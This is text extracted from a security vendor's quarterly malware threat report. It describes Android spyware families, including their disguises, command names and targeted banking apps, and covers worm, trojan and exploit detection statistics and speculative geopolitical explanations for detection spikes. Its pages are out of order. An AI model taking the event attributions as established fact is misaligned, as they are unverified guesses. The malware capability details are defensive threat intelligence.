In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
